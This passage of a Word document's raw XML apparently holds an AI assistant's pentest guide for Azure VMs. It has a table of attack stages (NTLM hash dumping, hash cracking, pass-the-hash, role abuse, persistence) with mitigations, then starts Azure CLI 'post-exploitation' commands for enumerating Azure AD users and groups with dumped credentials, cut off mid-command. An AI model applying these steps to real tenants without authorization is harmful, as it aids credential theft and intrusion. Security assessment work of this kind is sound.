              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00022C5E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Pentest Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29ADB882" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00022C5E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Azure VM Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="088C0B0D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00022C5E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D399A" w:rsidRPr="00022C5E" w14:paraId="06BC32E2" w14:textId="77777777" w:rsidTr="0039559A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CF8B1DC" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Initial Foothold</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BCC28F4" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Exploit weak credentials or RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="024BDF01" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Weak local creds, exposed RDP/SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33B6CBFB" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Harden passwords, limit RDP/SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D399A" w:rsidRPr="00022C5E" w14:paraId="7E05606B" w14:textId="77777777" w:rsidTr="0039559A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CF8B248" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Internal Monologue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BDC7E79" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Run tool to dump NTLM hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04ECCDCA" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>NTLMv1 enabled, registry writable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9F6C2B" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Disable NTLMv1, enforce NTLMv2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D399A" w:rsidRPr="00022C5E" w14:paraId="4B572B32" w14:textId="77777777" w:rsidTr="0039559A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F50EEEB" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Hash Cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EEA8590" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Crack hashes offline with John the Ripper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1612B723" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Weak passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67087AAD" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Enforce strong passwords, MFA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D399A" w:rsidRPr="00022C5E" w14:paraId="65699DD5" w14:textId="77777777" w:rsidTr="0039559A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A20E9AA" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BB10A0F" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Pass-the-Hash with dumped credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21DB9920" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Flat network, excessive privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="008E1288" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Network segmentation, limit admin rights</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D399A" w:rsidRPr="00022C5E" w14:paraId="33724A91" w14:textId="77777777" w:rsidTr="0039559A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FD8D796" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Azure AD Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CD36750" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Query Azure AD data with credentials or tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="352F4F64" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Over-permissioned accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7305754F" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Audit permissions, remove stale accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D399A" w:rsidRPr="00022C5E" w14:paraId="0C4D4BE3" w14:textId="77777777" w:rsidTr="0039559A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42A361AF" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10E75B95" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Abuse roles, app registrations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16B110EA" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Misconfigured roles and apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21E293D0" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>PIM, app registration hardening</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D399A" w:rsidRPr="00022C5E" w14:paraId="344986F7" w14:textId="77777777" w:rsidTr="0039559A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C64F539" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Persistence &amp; Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18203033" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Abuse Run Command, Azure Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25E5D99D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>Unrestricted Azure automation access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DDA21A4" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00022C5E">
              <w:t>RBAC, monitoring, just-in-time access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03CB8B46" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="444F5D61">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AAB23B" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Would you like me to also generate </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sample PowerShell or Azure CLI scripts</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> for these post-exploitation tasks, or help build an automated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> checklist/report?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598444F1" w14:textId="77777777" w:rsidR="003D399A" w:rsidRDefault="003D399A" w:rsidP="003D399A"/>
    <w:p w14:paraId="4255C4A4" w14:textId="77777777" w:rsidR="003D399A" w:rsidRDefault="003D399A" w:rsidP="003D399A"/>
    <w:p w14:paraId="6F65A16A" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Sure! Below are detailed </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure CLI scripts</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> that you can use during post-exploitation on Azure Windows/Linux VMs to enumerate and interact with Azure AD (Microsoft Entra ID) after dumping credentials like in the Internal Monologue attack. These scripts assume you have valid access tokens or credentials (user/password or token) to authenticate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EE578B" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="33BE287B">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA14909" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure CLI Post-Exploitation Scripts for Azure AD (Microsoft Entra ID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787BBA6E" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="2123D326">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DABF7D6" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Login to Azure CLI with Credentials or Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094F998C" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t>If you have username/password or service principal credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC24A4E" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t># Login interactively (if possible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A95FE3" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D0613B" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A"/>
    <w:p w14:paraId="5A2EDF23" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t># OR login with service principal (if you have app ID and secret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53331F39" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> login --service-principal -u &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>appId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>&gt; -p &lt;password-or-cert&gt; --tenant &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>tenantId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B41C1EB" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="766811D2">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B94A02" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. List All Azure AD Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63590F75" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> ad user list --query '[].{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Name:displayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>UserPrincipalName:userPrincipalName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>ID:objectId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>}' -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB2E873" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="1180AE43">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8C61A9" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Get Details of a Specific User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608B8116" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> ad user show --id user@domain.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E40A06" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="10A9F551">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61616AA2" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. List All Azure AD Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7144BC9D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> ad group list --query '[].{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>GroupName:displayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>ID:objectId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>}' -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7504C539" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="6334E802">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="530F1504" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. List Members of a Specific Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A6174B" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> ad group member list --group "&lt;group-object-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>-or-name&gt;" --query '[].{</w:t>
      </w:r>
